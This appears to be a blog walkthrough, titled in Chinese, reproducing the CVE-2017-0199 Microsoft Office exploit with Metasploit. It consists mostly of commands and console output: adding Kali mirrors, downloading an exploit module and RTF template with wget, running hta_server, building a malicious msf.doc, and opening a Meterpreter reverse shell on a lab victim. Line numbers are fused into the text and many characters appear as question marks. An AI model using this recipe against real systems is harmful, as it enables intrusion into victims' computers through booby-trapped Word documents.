cve-2017-0199&metasploit复现过程

 1 #清华大学 2 #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 3 #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 4 ?5 #浙大 6 #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 7 #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 8 ?9 #东软大学10 #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib11 #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib12 13 #官方源14 #deb http://http.kali.org/kali kali-rolling main non-free contrib15 #deb-src http://http.kali.org/kali kali-rolling main non-free contrib

1 apt-get clean && apt-get update -y && apt-get -f upgrade -y2 msfupdate

1 cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat2 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

1 cd /usr/share/metasploit-framework/data/exploits2 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

 1 root@kali:~# msfconsole 2 ???????????????????????????????????????????????????3 ?????, ??????????, 4 ????/ ?????????????5 ???((__---,,,---__)) 6 ??????(_) O O (_)_________ 7 ?????????\ _ / ???????????| 8 ??????????o_o \ ??M S F ??| ?9 ???????????????\ ??_____ ?| ?*10 ????????????????||| ??WW|||11 ????????????????||| ????|||12 13 14 Tired of typing ‘set RHOSTS‘? Click & pwn with Metasploit Pro15 Learn more on http://rapid7.com/metasploit16 17 ???????=[ metasploit v4.14.14-dev ????????????????????????]18 + -- --=[ 1642 exploits - 945 auxiliary - 289 post ???????]19 + -- --=[ 473 payloads - 40 encoders - 9 nops ????????????]20 + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]21 22 msf > use exploit/windows/misc/hta_server 23 msf exploit(hta_server) > show options 24 25 Module options (exploit/windows/misc/hta_server):26 27 ???Name ????Current Setting ?Required ?Description28 ???---- ????--------------- ?-------- ?-----------29 ???SRVHOST ?0.0.0.0 ?????????yes ??????The local host to listen on. This must be an address on the local machine or 0.0.0.030 ???SRVPORT ?8080 ????????????yes ??????The local port to listen on.31 ???SSL ?????false ???????????no ???????Negotiate SSL for incoming connections32 ???SSLCert ??????????????????no ???????Path to a custom SSL certificate (default is randomly generated)33 ???URIPATH ??????????????????no ???????The URI to use for this exploit (default is random)34 35 36 Exploit target:37 38 ???Id ?Name39 ???-- ?----40 ???0 ??Powershell x8641 42 43 msf exploit(hta_server) > run44 [*] Exploit running as background job.45 46 [*] Started reverse TCP handler on 192.168.1.101:4444 47 [*] Using URL: http://0.0.0.0:8080/h48EGx964y.hta48 [*] Local IP: http://192.168.1.101:8080/h48EGx964y.hta49 [*] Server started.50 msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta51 msf exploit(office_word_hta) > show options 52 53 Module options (exploit/windows/fileformat/office_word_hta):54 55 ???Name ??????Current Setting ?????????????Required ?Description56 ???---- ??????--------------- ?????????????-------- ?-----------57 ???FILENAME ???????????????????????????????no ???????The file name.58 ???TARGETURI ?http://example.com/test.rtf ?yes ??????The path to a online hta file.59 60 61 Exploit target:62 63 ???Id ?Name64 ???-- ?----65 ???0 ??Microsoft Office Word

 1 msf exploit(office_word_hta) > set TARGETURI http://192.168.1.101:8080/h48EGx964y.hta 2 TARGETURI => http://192.168.1.101:8080/h48EGx964y.hta 3 msf exploit(office_word_hta) > set FILENAME msf.doc 4 FILENAME => msf.doc 5 msf exploit(office_word_hta) > run 6 ?7 [+] msf.doc stored at /root/.msf4/local/msf.doc 8 msf exploit(office_word_hta) > ?9 msf exploit(office_word_hta) > 10 msf exploit(office_word_hta) > 11 msf exploit(office_word_hta) > 12 msf exploit(office_word_hta) > 13 msf exploit(office_word_hta) > 14 msf exploit(office_word_hta) > 15 16 msf exploit(office_word_hta) > 17 msf exploit(office_word_hta) > 18 msf exploit(office_word_hta) > 19 msf exploit(office_word_hta) > 20 msf exploit(office_word_hta) > 21 msf exploit(office_word_hta) > 22 [*] 192.168.1.108 ???hta_server - Delivering Payload23 [*] 192.168.1.108 ???hta_server - Delivering Payload24 [*] Sending stage (957487 bytes) to 192.168.1.10825 [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.108:11021) at 2017-05-03 00:30:58 +080026 27 msf exploit(office_word_hta) > sessions -i28 29 Active sessions30 ===============31 32 ??Id ?Type ????????????????????Information ??????Connection33 ??-- ?---- ????????????????????----------- ??????----------34 ??1 ??meterpreter x86/windows ?FEIYU\yu @ FEIYU ?192.168.1.101:4444 -> 192.168.1.108:11021 (192.168.1.108)35 36 msf exploit(office_word_hta) > session 137 [-] Unknown command: session.38 msf exploit(office_word_hta) > sessions -i 139 [*] Starting interaction with 1...